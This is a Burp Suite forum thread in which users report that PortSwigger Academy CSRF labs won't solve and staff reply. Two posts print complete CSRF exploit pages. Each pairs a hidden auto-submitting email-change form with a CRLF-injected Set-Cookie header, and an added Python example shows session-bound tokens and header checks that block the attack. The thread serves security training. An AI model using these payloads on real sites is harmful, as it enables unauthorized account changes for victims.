The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


CSRF Labs are buggy not working

M | Last updated: Feb 08, 2023 12:32PM UTC

Currently I'm trying to solve the CSRF labs. However, it seems that these are not working properly; it seems that the system doesn't work when you "deliver exploit to user". I know for a fact that the CSRF payload is working: when I use the option "view exploit", the e-mail address of the user peter wiener gets updated. So it is not the payload that isn't working. Things I tried: a different form payload, the community solution, the Burp Suite-provided solution. No matter what I do, the lab doesn't see any solution as the proper solution.

nate | Last updated: Feb 08, 2023 02:21PM UTC

Same issue - definitely works for me but when delivering to client the client IP is never logged

Ben, PortSwigger Agent | Last updated: Feb 09, 2023 09:34AM UTC

Hi both, Just to clarify, you are having issues solving all of the labs in the CSRF topic or just certain ones? Are we able to drill down into a specific lab and get some details of how you are trying to solve it so that we can take a look at this for you?

Eragon | Last updated: Feb 09, 2023 12:05PM UTC

As in the lab, we can exploit the redirect_uri vulnerability by using the exploit server. I was wondering if you could help me understand how someone could exploit the redirect URI vulnerability in OAuth without knowing a valid client ID. From what I understand, the client ID acts as an identifier for the OAuth client, and without it, the authorization server will not proceed with the authorization flow. And in the lab, are we able to get the auth code from the admin without knowing his client_id? Can you explain this further and whether there is a way to exploit the redirect URI without a valid client ID?

Ben, PortSwigger Agent | Last updated: Feb 10, 2023 08:17AM UTC

Hi Eragon, Thanks for your query. Unfortunately, we are unable to provide personal support or tutoring to Academy users, as we prefer to improve the experience for our entire userbase by focussing on expanding and refining our public content. We will leave your post up on the forum in case a member of the community wants to reply.

Kartik | Last updated: Feb 26, 2023 03:24AM UTC

Same issue. All CSRF labs are not working.

Ben, PortSwigger Agent | Last updated: Feb 27, 2023 05:35PM UTC

Hi Kartik, Are you able to provide us with some details of what steps you are carrying out to try and solve one of the labs so that we can take a look at this for you?

Moustafa | Last updated: Jun 27, 2024 12:25PM UTC

Did you solve it?

Ben, PortSwigger Agent | Last updated: Jun 27, 2024 12:29PM UTC

Hi Moustafa, These labs should still be solvable using a standard version of Chrome. If you are having any specific issues with a particular lab then please let us know which lab, what your payload looks like and what you see when you view your exploit so that we can assist you further with this.

Manish | Last updated: Sep 13, 2024 08:29AM UTC

I am currently working on the CSRF labs and encountered issues with two specific labs:

Lab 5: CSRF where the token is tied to a non-session cookie
Lab 6: CSRF where the token is duplicated in the cookie

Payload of LAB 6:

    <html>
    <body>
    <script>history.pushState('', '', '/');</script>
    <form action="https://0a8100f304cda36a8053805a00d700b6.web-security-academy.net/my-account/change-email" method="POST">
    <input type="hidden" name="email" value="usertest@gmail.com" />
    <input type="hidden" name="csrf" value="iOfnXm4bKaalvBK2w3Itvkm3Vw2VsTCI" />
    <input type="submit" value="Submit request" />
    </form>
    <img src="0a8100f304cda36a8053805a00d700b6.web-security-academy.net/?search=please%0d%0aSet-Cookie:%20csrf=iOfnXm4bKaalvBK2w3Itvkm3Vw2VsTCI" width="0" height="0" border="0" onerror="document.forms[0].submit()">
    </body>
    </html>

While the `View Exploit` feature works, the `Deliver Exploit to Victim` feature does not function correctly after storing the payload in the Body. I have tried various browsers, including Google Chrome, Burp Chrome, Brave, Microsoft Edge, Firefox, and Cyberfox, but the issue persists across all browsers.

Ben, PortSwigger Agent | Last updated: Sep 17, 2024 07:57AM UTC

Hi Manish, For the 6th lab, as noted in the written solution, you need to set the CSRF token to the value of 'false'. I have just run through this lab and been able to solve it using the written solution so it does appear to be working as expected.

Manish | Last updated: Sep 17, 2024 12:42PM UTC

Hi Ben, Also, after modifying the value of CSRF to false, I started encountering an "Invalid CSRF token" error. This error seems to occur when I attempt to click on "View Exploit". Still these 2 labs have some kind of issues. Could you please provide guidance on why this error is being triggered and how to proceed with this scenario?

Ben, PortSwigger Agent | Last updated: Sep 17, 2024 12:56PM UTC

Hi Manish, If it helps, this is the exploit I am using for the lab 'CSRF where the token is duplicated in the cookie':

    <html>
    <!-- CSRF PoC - generated by Burp Suite Professional -->
    <body>
    <form action="https://0aa5006d03cf1c42800e171c001100b2.web-security-academy.net/my-account/change-email" method="POST">
    <input type="hidden" name="email" value="test3&#64;hotmail&#46;com" />
    <input type="hidden" name="csrf" value="fake" />
    <input type="submit" value="Submit request" />
    </form>
    <img src="https://0aa5006d03cf1c42800e171c001100b2.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None" onerror="document.forms[0].submit();"/>
    </body>
    </html>

Testing this again and it solves the lab.
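
The two posts above show why the lab is solvable: the application reflects a parameter into a response header without stripping CR/LF, and its CSRF check only compares the cookie value with the form value. The following is an added example, not code from the thread or from the lab, that models both checks in Python (the session id, secret and token values are constructed) and shows how a session-bound token and a header-value check close the gap.

```python
import hashlib
import hmac

# Constructed value mirroring the thread: the same attacker-chosen token ends
# up in both the csrf cookie and the form field.
ATTACKER_TOKEN = "fake"


def check_csrf_duplicated_in_cookie(cookie_token: str, form_token: str) -> bool:
    """Weak pattern from the lab: accept when cookie and form values match.
    Nothing binds the token to the user's session, so any value an attacker
    can plant in the cookie also passes the check."""
    if not cookie_token:
        return False
    return hmac.compare_digest(cookie_token.encode(), form_token.encode())


def issue_session_bound_token(session_id: str, server_secret: bytes) -> str:
    """Hardened: derive the token from the session id with a server-side
    secret, so only the server can produce a valid token for that session."""
    return hmac.new(server_secret, session_id.encode(), hashlib.sha256).hexdigest()


def check_csrf_session_bound(session_id: str, form_token: str, server_secret: bytes) -> bool:
    expected = issue_session_bound_token(session_id, server_secret)
    return hmac.compare_digest(expected.encode(), form_token.encode())


def header_value_is_safe(value: str) -> bool:
    """Reject values that would let a reflected parameter inject new headers
    (the CR/LF seen in the 'search' payload above)."""
    return "\r" not in value and "\n" not in value


def demo():
    secret = b"constructed-server-secret"   # assumption: held only by the server
    victim_session = "wiener-session-0001"  # constructed session id
    weak_pass = check_csrf_duplicated_in_cookie(ATTACKER_TOKEN, ATTACKER_TOKEN)
    strong_fail = check_csrf_session_bound(victim_session, ATTACKER_TOKEN, secret)
    legit = issue_session_bound_token(victim_session, secret)
    strong_pass = check_csrf_session_bound(victim_session, legit, secret)
    injected = header_value_is_safe("please\r\nSet-Cookie: csrf=fake")
    return weak_pass, strong_fail, strong_pass, injected


if __name__ == "__main__":
    print(demo())
```

The weak check accepts the attacker's duplicated token; the session-bound check rejects it and accepts only the token the server issued for that session.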

Manish | Last updated: Sep 18, 2024 06:28AM UTC